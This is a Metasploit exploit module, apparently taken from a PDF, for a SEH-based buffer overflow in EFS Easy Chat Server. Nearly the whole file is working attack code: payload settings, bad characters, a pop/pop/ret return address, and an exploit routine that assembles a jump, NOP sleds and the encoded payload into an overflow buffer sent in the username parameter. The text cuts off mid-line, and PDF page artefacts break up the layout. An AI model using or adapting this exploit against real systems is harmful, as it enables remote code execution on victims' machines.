1 ##
2 # $Id: ca_igateway_debug.rb 6568 2009−05−19 13:20:32Z hdm $
3 ##
4
5 ##
6 # This file is part of the Metasploit Framework and may be subject to
7 # redistribution and commercial restrictions. Please see the Metasploit
8 # Framework web site for more information on licensing and terms of use.
9 # http://metasploit.com/framework/
10 ##
11
12
13
14 class Metasploit3 < Msf::Exploit::Remote
15
16
include Msf::Exploit::Remote::Tcp
17
include Msf::Exploit::Seh
18
19
def initialize(info = {})
20
super(update_info(info,
21
’Name’ => ’EFS Easy Chat server Universal BOF−SEH (META)’,
22
’Description’ => %q{
23
This module exploits a vulnerability in Easy chat server by passing
24
an arbitary evil biuffer along with the username password.
25
Sucessful attack could run arbitary code on victim machine
26
},
27
’Author’ => ’FB1H2S’,
28
’License’ => MSF_LICENSE,
29
’Version’ => ’’,
30
’References’ =>
31
[
32
[ ’Exploitdb’, ’http://www.exploit−db.com/exploits/11179’ ],
33
34
],
35
’DefaultOptions’ =>
36
{
37
’EXITFUNC’ => ’seh’,
38
},
39
’Payload’ =>
40
{
41
’Space’ => 1200,
42
’BadChars’ => "\x00\x0a\x0d\x20",
43
’StackAdjustment’ => −3500,
44
’Compat’ =>
45
{
46
’ConnectionType’ => ’+ws2ord’,
47
},
48
},
49
’Platform’ => ’win’,
50
’Targets’ =>
51
[
52
[ ’EFS Easy Chat Server Universal’, { ’Ret’ => 0x1001b9a2 } ], # p/p/r
Page 1/2
EFS Easy Chat server Universal BOFSEH Meta
FB1H2S
01/21/2010
53
],
54
’Privileged’ => true,
55
’DisclosureDate’ => ’jan 2010’,
56
’DefaultTarget’ => 0))
57
58
register_options(
59
[
60
Opt::RPORT(80),
61
], self.class)
62
end
63
64
65
66
def exploit
67
connect
68
sploit = Rex::Text.rand_text_alphanumeric(216)
69
sploit << "\xeb\x06\x90\x90" # short jump 6 bytes
70
sploit << [target.ret].pack(’V’) #ppr universal
71
sploit << "\x90" * 20 # nop sled
72
sploit << payload.encoded #payload \xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc
73
sploit << "\x90" * 20
74
request= ’chat.ghp?username=’ +spl